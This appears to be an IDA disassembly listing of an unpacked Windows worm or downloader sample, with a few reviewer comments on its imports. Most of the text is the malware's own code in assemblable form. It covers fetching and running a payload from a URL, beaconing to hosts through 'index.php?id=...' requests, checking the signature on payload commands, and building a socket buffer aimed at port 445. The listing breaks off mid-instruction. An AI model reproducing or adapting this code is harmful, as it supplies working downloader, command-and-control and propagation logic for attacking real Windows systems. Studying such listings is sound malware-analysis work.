;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0D26A6EC0868FCB83A012261EDE6AB4D
; File Name : u:\work\0d26a6ec0868fcb83a012261ede6ab4d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
;
; Reviewer notes on this listing (32-bit x86, MASM-style IDA output):
;  * The file name ends in "_unpacked.exe" and the only section is named UPX0
;    with Read/Write/Execute permissions, so this is an unpacked image of a
;    packed sample. The MD5 above is IDA's "Input MD5" for that unpacked input;
;    whether it also matches the packed on-disk file is not shown here.
;  * The dwords below are the import slots. IDA annotated each with the API it
;    "resolved to", i.e. the values are run-time addresses taken from the
;    analysis machine's DLL builds. They are not portable indicators; the API
;    names are the useful part.
;  * Capability summary from the imported names alone (a triage hint, not proof
;    of use): registry read/write/delete, CryptoAPI hash + signature
;    verification, Toolhelp32 process enumeration with TerminateProcess,
;    OpenProcess + WriteProcessMemory, WinINet HTTP client, Winsock client and
;    listener (bind/listen/accept), AbortSystemShutdownA, WinExec/CreateProcessA.

; IDA helper macro: emits each character of <string> followed by the byte
; "page", then an optional terminating word.
unicode         macro page,string,zero
                irpc c,<string>
                db '&c', page
                endm
                ifnb <zero>
                dw zero
                endif
                endm

                .686p
                .mmx
                .model flat

; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0            segment para public 'CODE' use32
                assume cs:UPX0
                ;org 31421000h
                assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing

; ---- ADVAPI32: registry ---------------------------------------------------
dword_31421000  dd 77DDEAF4h            ; resolved to->ADVAPI32.RegCreateKeyExA
dword_31421004  dd 77DDEBE7h            ; resolved to->ADVAPI32.RegSetValueExA
dword_31421008  dd 77DD7883h            ; resolved to->ADVAPI32.RegQueryValueExA
dword_3142100C  dd 77DD761Bh            ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1Dr
dword_31421010  dd 77DDEDE5h            ; resolved to->ADVAPI32.RegDeleteValueA
dword_31421014  dd 77DD6BF0h            ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4Er ...
dword_31421018  dd 77E34D78h            ; resolved to->ADVAPI32.AbortSystemShutdownA
; ---- ADVAPI32: CryptoAPI (used by the signature check around sub_3142179A) --
dword_3142101C  dd 77DEA2F9h            ; resolved to->ADVAPI32.CryptCreateHash
dword_31421020  dd 77DEA122h            ; resolved to->ADVAPI32.CryptHashData
dword_31421024  dd 77DEAB80h            ; resolved to->ADVAPI32.CryptVerifySignatureA
dword_31421028  dd 77DEA254h            ; resolved to->ADVAPI32.CryptDestroyHash
dword_3142102C  dd 77DEA544h            ; resolved to->ADVAPI32.CryptDestroyKey
dword_31421030  dd 77DE8546h            ; resolved to->ADVAPI32.CryptReleaseContext
dword_31421034  dd 77DE7F96h            ; resolved to->ADVAPI32.CryptAcquireContextA
dword_31421038  dd 77DEA879h            ; resolved to->ADVAPI32.CryptImportKey
                align 10h
; ---- KERNEL32 ---------------------------------------------------------------
dword_31421040  dd 7C809AE4h            ; resolved to->KERNEL32.VirtualFree
dword_31421044  dd 7C809A51h            ; resolved to->KERNEL32.VirtualAlloc
dword_31421048  dd 7C80B4CFh            ; resolved to->KERNEL32.GetModuleFileNameA
dword_3142104C  dd 7C80BAA1h            ; resolved to->KERNEL32.lstrcmpiA
dword_31421050  dd 7C8286EEh            ; resolved to->KERNEL32.CopyFileA
dword_31421054  dd 7C86136Dh            ; resolved to->KERNEL32.WinExec
dword_31421058  dd 7C864B0Fh            ; resolved to->KERNEL32.CreateToolhelp32Snapshot
dword_3142105C  dd 7C863DE5h            ; resolved to->KERNEL32.Process32First
dword_31421060  dd 7C801E16h            ; resolved to->KERNEL32.TerminateProcess
dword_31421064  dd 7C863F58h            ; resolved to->KERNEL32.Process32Next
dword_31421068  dd 7C80BE01h            ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8Fr
dword_3142106C  dd 7C8308ADh            ; resolved to->KERNEL32.CreateEventA
dword_31421070  dd 7C802520h            ; resolved to->KERNEL32.WaitForSingleObject
dword_31421074  dd 7C831EABh            ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+Fr
dword_31421078  dd 7C810D87h            ; resolved to->KERNEL32.WriteFile
dword_3142107C  dd 7C809B47h            ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6r ...
dword_31421080  dd 7C801A24h            ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57r
dword_31421084  dd 7C80BDB6h            ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64r ...
dword_31421088  dd 7C834D41h            ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40r
dword_3142108C  dd 7C814EEAh            ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1Br
dword_31421090  dd 7C80D262h            ; resolved to->KERNEL32.GetLocaleInfoA
dword_31421094  dd 7C802442h            ; resolved to->KERNEL32.Sleep ; sub_31421801+16Cr ...
dword_31421098  dd 7C80978Eh            ; resolved to->KERNEL32.InterlockedExchange
dword_3142109C  dd 7C810111h            ; resolved to->KERNEL32.lstrcpynA
dword_314210A0  dd 7C80DDF5h            ; resolved to->KERNEL32.GetCurrentProcess
dword_314210A4  dd 7C80ADA0h            ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2Cr
dword_314210A8  dd 7C801D77h            ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116r
dword_314210AC  dd 7C80220Fh            ; resolved to->KERNEL32.WriteProcessMemory
dword_314210B0  dd 7C8309E1h            ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92r
dword_314210B4  dd 7C80B6A1h            ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336r
dword_314210B8  dd 7C80929Ch            ; resolved to->KERNEL32.GetTickCount
dword_314210BC  dd 7C80E93Fh            ; resolved to->KERNEL32.CreateMutexA
dword_314210C0  dd 7C810637h            ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12r
dword_314210C4  dd 7C802367h            ; resolved to->KERNEL32.CreateProcessA
dword_314210C8  dd 7C80A017h            ; resolved to->KERNEL32.SetEvent
dword_314210CC  dd 7C81320Ch            ; resolved to->KERNEL32.OpenEventA
dword_314210D0  dd 7C80C058h            ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66r ...
dword_314210D4  dd 7C809766h            ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3Fr ...
dword_314210D8  dd 7C80180Eh            ; resolved to->KERNEL32.ReadFile
dword_314210DC  dd 7C810A77h            ; resolved to->KERNEL32.GetFileSize
dword_314210E0  dd 7C81CDDAh            ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3r
dword_314210E4  dd 7C910331h, 0         ; resolved to->NTDLL.RtlGetLastWin32Error
; ---- MSVCRT -----------------------------------------------------------------
dword_314210EC  dd 77C371BCh            ; resolved to->MSVCRT.srand
dword_314210F0  dd 77C46F70h            ; resolved to->MSVCRT.memcpy
dword_314210F4  dd 77C478A0h            ; resolved to->MSVCRT.strlen
dword_314210F8  dd 77C475F0h            ; resolved to->MSVCRT.memset
dword_314210FC  dd 77C371D3h            ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84r ...
; ---------------------------------------------------------------------------
; NOTE(review): the three instructions and the "db 77h" below occupy exactly
; one dword slot (31421100h..31421103h) between two MSVCRT import slots, and
; the only reference is a DATA read from loc_31422CD0. Their encodings
; (94h, 5Ch, C3h, 77h) read as the little-endian pointer 77C35C94h, so this is
; most likely another MSVCRT import slot that IDA decoded as code -- confirm
; by redefining the item as a dword. Do not treat it as a real routine.

loc_31421100:                           ; DATA XREF: UPX0:loc_31422CD0r
                xchg    eax, esp
                pop     esp
                retn
; ---------------------------------------------------------------------------
                db 77h
dword_31421104  dd 77C47C60h            ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AFr ...
dword_31421108  dd 77C47660h            ; resolved to->MSVCRT.strchr ; sub_31421422+AAr
                align 10h
; ---- USER32 -----------------------------------------------------------------
dword_31421110  dd 7E42DE87h            ; resolved to->USER32.FindWindowA
dword_31421114  dd 7E41BE4Bh            ; resolved to->USER32.GetForegroundWindow
dword_31421118  dd 7E418A80h            ; resolved to->USER32.GetWindowThreadProcessId
dword_3142111C  dd 7E41A8ADh            ; resolved to->USER32.wsprintfA ; sub_314215C7+77r ...
                dd 0
; ---- WININET ----------------------------------------------------------------
dword_31421124  dd 42C30BFAh            ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9Dr
dword_31421128  dd 42C2C8A1h            ; resolved to->WININET.InternetOpenA ; sub_314215C7+89r
dword_3142112C  dd 42C1DAC1h            ; resolved to->WININET.InternetCloseHandle
dword_31421130  dd 42C367F6h            ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2r
dword_31421134  dd 42C2ABF4h            ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0r
                dd 0
; ---- WS2_32 -----------------------------------------------------------------
dword_3142113C  dd 71AB664Dh            ; resolved to->WS2_32.WSAStartup
dword_31421140  dd 71AB3E00h            ; resolved to->WS2_32.bind
dword_31421144  dd 71AB88D3h            ; resolved to->WS2_32.listen
dword_31421148  dd 71AC1028h            ; resolved to->WS2_32.accept
dword_3142114C  dd 71AB50C8h            ; resolved to->WS2_32.gethostname
dword_31421150  dd 71AB94DCh            ; resolved to->WS2_32.WSAGetLastError
dword_31421154  dd 71AB4FD4h            ; resolved to->WS2_32.gethostbyname
dword_31421158  dd 71AB3B91h            ; resolved to->WS2_32.socket ; sub_314221C4+ACr
dword_3142115C  dd 71AB3F41h            ; resolved to->WS2_32.inet_ntoa ; sub_31422712+Dr
dword_31421160  dd 71AB2B66h            ; resolved to->WS2_32.ntohs ; sub_314221C4+F0r
dword_31421164  dd 71AB406Ah            ; resolved to->WS2_32.connect
dword_31421168  dd 71AB428Ah            ; resolved to->WS2_32.send ; sub_3142207E+67r ...
dword_3142116C  dd 71AB615Ah            ; resolved to->WS2_32.recv ; sub_31421801+1D8r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128r dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12Fr align 10h dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1 align 10h dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2 align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314211A0 proc near ; CODE XREF: sub_31421422+16Dp var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_314211CB push 1 jmp loc_31421261 ; --------------------------------------------------------------------------- loc_314211CB: ; CODE XREF: sub_314211A0+22j lea eax, [ebp+var_110] push 104h push eax call dword_3142108C ; GetSystemDirectoryA mov edi, dword_31421088 lea eax, [ebp+var_110] push offset dword_314241F8 push eax call edi ; lstrcatA lea eax, [ebp+var_110] push 6 push eax call dword_31421084 ; lstrlenA lea eax, [ebp+eax+var_110] push eax call sub_31421F73 pop ecx lea eax, [ebp+var_110] pop ecx push offset dword_314241F0 push eax call edi ; lstrcatA push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_31421080 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31421241 push 2 jmp short loc_31421261 ; --------------------------------------------------------------------------- loc_31421241: ; CODE XREF: sub_314211A0+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31421124 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_31421264 push [ebp+var_4] call dword_3142107C ; CloseHandle push 3 loc_31421261: ; CODE XREF: sub_314211A0+26j ; 
sub_314211A0+9Fj pop eax jmp short loc_314212B5 ; --------------------------------------------------------------------------- loc_31421264: ; CODE XREF: sub_314211A0+B4j mov edi, 100000h push edi call sub_31422CA5 mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31421134 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_31421078 ; WriteFile push [ebp+var_4] call dword_3142107C ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_31421FA3 push ebx call sub_31422CB9 add esp, 0Ch xor eax, eax loc_314212B5: ; CODE XREF: sub_314211A0+C2j pop edi pop esi pop ebx leave retn sub_314211A0 endp ; =============== S U B R O U T I N E ======================================= sub_314212BA proc near ; CODE XREF: sub_31421422+F8p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = byte ptr 0Ch mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_314212D1: ; CODE XREF: sub_314212BA+56j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 sub dl, [esp+0Ch+arg_8] shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl sub dl, [esp+0Ch+arg_8] add eax, 3 shl bl, 4 and bl, 0F0h or dl, bl mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, 30h jl short loc_314212D1 pop edi pop esi pop ebx retn sub_314212BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421316 proc near ; CODE XREF: sub_3142139B+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea 
edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_31421349 add ebx, 1Ah loc_31421349: ; CODE XREF: sub_31421316+2Ej movsx edi, [ebp+arg_0] mov esi, dword_31421108 lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421373 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421373: ; CODE XREF: sub_31421316+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421393 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421393: ; CODE XREF: sub_31421316+68j mov al, [ebp+arg_0] loc_31421396: ; CODE XREF: sub_31421316+5Bj ; sub_31421316+7Bj pop edi pop esi pop ebx leave retn sub_31421316 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142139B proc near ; CODE XREF: sub_31421422+D6p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_314213F8 mov edi, [ebp+arg_0] push ebx loc_314213B0: ; CODE XREF: sub_3142139B+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_31421316 mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_314213DC cmp bl, 7Ah jg short loc_314213DC movsx esi, bl sub esi, 61h loc_314213DC: ; CODE XREF: sub_3142139B+34j ; sub_3142139B+39j cmp bl, 41h jl short loc_314213EC cmp bl, 5Ah jg short loc_314213EC movsx esi, bl sub esi, 41h loc_314213EC: ; CODE XREF: sub_3142139B+44j ; sub_3142139B+49j mov eax, [ebp+arg_4] mov al, 
[eax] test al, al jnz short loc_314213B0 pop ebx jmp short loc_314213FB ; --------------------------------------------------------------------------- loc_314213F8: ; CODE XREF: sub_3142139B+Fj mov edi, [ebp+arg_0] loc_314213FB: ; CODE XREF: sub_3142139B+5Bj and byte ptr [edi], 0 pop edi pop esi pop ebp retn sub_3142139B endp ; =============== S U B R O U T I N E ======================================= sub_31421402 proc near ; CODE XREF: sub_31421422+104p arg_0 = dword ptr 4 xor eax, eax xor ecx, ecx loc_31421406: ; CODE XREF: sub_31421402+12j mov edx, [esp+arg_0] movzx edx, byte ptr [ecx+edx] add eax, edx inc ecx cmp ecx, 30h jl short loc_31421406 push 1Ah cdq pop ecx idiv ecx mov eax, edx add eax, 61h retn sub_31421402 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421422 proc near ; CODE XREF: sub_314215C7+BAp var_174 = dword ptr -174h var_170 = byte ptr -170h var_168 = byte ptr -168h var_164 = byte ptr -164h var_134 = dword ptr -134h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = dword ptr -128h var_124 = byte ptr -124h var_11C = byte ptr -11Ch var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421180 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 164h push ebx push esi push edi mov [ebp+var_128], 1 and [ebp+var_4], 0 push offset aZer0 ; "zer0" push [ebp+arg_0] call dword_31421104 ; strstr pop ecx pop ecx mov edi, eax mov [ebp+var_130], edi test edi, edi jz loc_314215A8 add edi, 4 mov [ebp+var_130], edi jz loc_314215A8 push edi call dword_31421084 ; lstrlenA mov [ebp+var_1C], eax cmp eax, 50h jle loc_314215A8 and byte ptr [edi+100h], 0 mov al, [edi] mov [ebp+var_168], al movsx ebx, al sub ebx, 61h mov [ebp+var_12C], ebx js loc_314215A8 cmp ebx, 1Ah jge loc_314215A8 inc edi mov [ebp+var_130], edi push 7Eh push edi call dword_31421108 ; strchr pop 
ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_314215A8 mov al, [esi] mov [ebp+var_170], al and byte ptr [esi], 0 push ebx push edi lea eax, [ebp+var_11C] push eax call sub_3142139B mov al, [ebp+var_170] mov [esi], al inc esi mov [ebp+var_130], esi xor edi, edi push edi lea eax, [ebp+var_164] push eax lea eax, [esi+1] push eax call sub_314212BA lea eax, [ebp+var_164] push eax call sub_31421402 add esp, 1Ch cmp [esi], al jnz short loc_314215A8 push 44h push offset dword_31424000 lea eax, [ebp+var_124] push eax call sub_3142172F add esp, 0Ch lea eax, [ebp+var_174] push eax push 30h lea eax, [ebp+var_164] push eax lea eax, [ebp+var_11C] push eax call dword_31421084 ; lstrlenA push eax lea eax, [ebp+var_11C] push eax lea eax, [ebp+var_124] push eax call sub_3142179A add esp, 18h test eax, eax jnz short loc_3142159B cmp [ebp+var_174], edi jz short loc_3142159B lea eax, [ebp+var_11C] push eax call sub_314211A0 pop ecx mov [ebp+var_128], edi loc_3142159B: ; CODE XREF: sub_31421422+15Cj ; sub_31421422+164j lea eax, [ebp+var_124] push eax call sub_3142177E pop ecx loc_314215A8: ; CODE XREF: sub_31421422+4Ej ; sub_31421422+5Dj ... or [ebp+var_4], 0FFFFFFFFh call nullsub_1 mov eax, [ebp+var_128] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_31421422 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. 
PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314215C7 proc near ; CODE XREF: sub_314216A2+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31422CA5 pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31421090 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_3142162F lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_31424FEC push dword_31425004 push offset aFgnsdrjyrsert ; "fgnsdrjyrsert" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_3142111C ; wsprintfA add esp, 1Ch jmp short loc_31421647 ; --------------------------------------------------------------------------- loc_3142162F: ; CODE XREF: sub_314215C7+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_3142111C ; wsprintfA add esp, 0Ch loc_31421647: ; CODE XREF: sub_314215C7+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... 
call dword_31421128 ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31421124 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31421134 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_31421422 push esi call sub_31422CB9 mov esi, dword_3142112C pop ecx pop ecx push ebx call esi ; InternetCloseHandle push edi call esi ; InternetCloseHandle mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_314215C7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_314216A2 proc near ; DATA XREF: sub_314223B2+15Bo push ebx mov ebx, dword_31421098 push esi push edi loc_314216AB: ; CODE XREF: sub_314216A2+88j xor esi, esi mov edi, 46021h loc_314216B2: ; CODE XREF: sub_314216A2+86j inc esi inc esi call sub_31422038 test eax, eax jz short loc_314216FC mov al, byte_31424080[esi+esi*4] push eax push off_31424081[esi+esi*4] call sub_314215C7 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314216FC push 0 push offset dword_31425004 call ebx ; InterlockedExchange push 0 push offset dword_31424FEC call ebx ; InterlockedExchange loc_314216FC: ; CODE XREF: sub_314216A2+19j ; sub_314216A2+46j call dword_314210FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31422068 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_31421094 ; Sleep cmp esi, 16h jb short loc_314216B2 jmp loc_314216AB sub_314216A2 endp ; =============== S U B R O U T I N E ======================================= sub_3142172F proc near ; CODE XREF: sub_31421422+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31421034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 8 push 1 push 
edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 1 pop eax jmp short loc_3142177A ; --------------------------------------------------------------------------- loc_3142175C: ; CODE XREF: sub_3142172F+19j ; sub_3142172F+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31421038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_3142177A: ; CODE XREF: sub_3142172F+2Bj pop edi pop esi pop ebx retn sub_3142172F endp ; =============== S U B R O U T I N E ======================================= sub_3142177E proc near ; CODE XREF: sub_31421422+180p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3142102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31421030 ; CryptReleaseContext xor eax, eax pop esi retn sub_3142177E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142179A proc near ; CODE XREF: sub_31421422+152p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3142101C ; CryptCreateHash test eax, eax jnz short loc_314217C0 push 1 pop eax jmp short loc_314217FD ; --------------------------------------------------------------------------- loc_314217C0: ; CODE XREF: sub_3142179A+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31421020 ; CryptHashData test eax, eax jnz short loc_314217D9 push 2 pop edi jmp short loc_314217F2 ; --------------------------------------------------------------------------- loc_314217D9: ; CODE XREF: sub_3142179A+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call 
dword_31421024 ; CryptVerifySignatureA mov ecx, [ebp+arg_14] mov [ecx], eax loc_314217F2: ; CODE XREF: sub_3142179A+3Dj push [ebp+arg_0] call dword_31421028 ; CryptDestroyHash mov eax, edi loc_314217FD: ; CODE XREF: sub_3142179A+24j pop edi pop esi pop ebp retn sub_3142179A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421801 proc near ; CODE XREF: sub_3142255F+36p ; sub_314225C3+48p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31422CF0 mov eax, dword_31424C84 push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31424C88 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_31421158 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31421D61 push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_3142115C ; inet_ntoa 
push eax lea eax, [ebp+var_6C] push eax call dword_3142109C ; lstrcpynA lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31424C78 push eax call dword_3142111C ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31421874: ; CODE XREF: sub_31421801+83j mov dl, [ebp+ecx+var_4C] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 28h jl short loc_31421874 push 60h lea eax, [ebp+var_E4] push offset dword_31424798 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl eax, 1 push eax lea eax, [ebp+var_134] push eax lea eax, [ebp+var_B4] push eax call sub_31422CE2 ; memcpy add esp, 1Ch lea eax, [ebp+var_4C] push 9 push (offset aC+3) push eax call sub_31422CDC ; strlen pop ecx lea eax, [ebp+eax*2+var_B5] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen add al, 1Ah push edi shl al, 1 mov [ebp+var_5], al lea eax, [ebp+var_5] push eax lea eax, [ebp+var_E1] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl al, 1 add al, 9 push edi mov [ebp+var_6], al lea eax, [ebp+var_6] push eax lea eax, [ebp+var_B7] push eax call sub_31422CE2 ; memcpy push 0E29h lea eax, [ebp+var_1F28] push 31h push eax call sub_31422CD6 ; memset push 10h lea eax, [ebp+var_24] push ebx push eax call sub_31422CD6 ; memset add esp, 44h mov [ebp+var_24], 2 push 1BDh call dword_31421160 ; ntohs mov 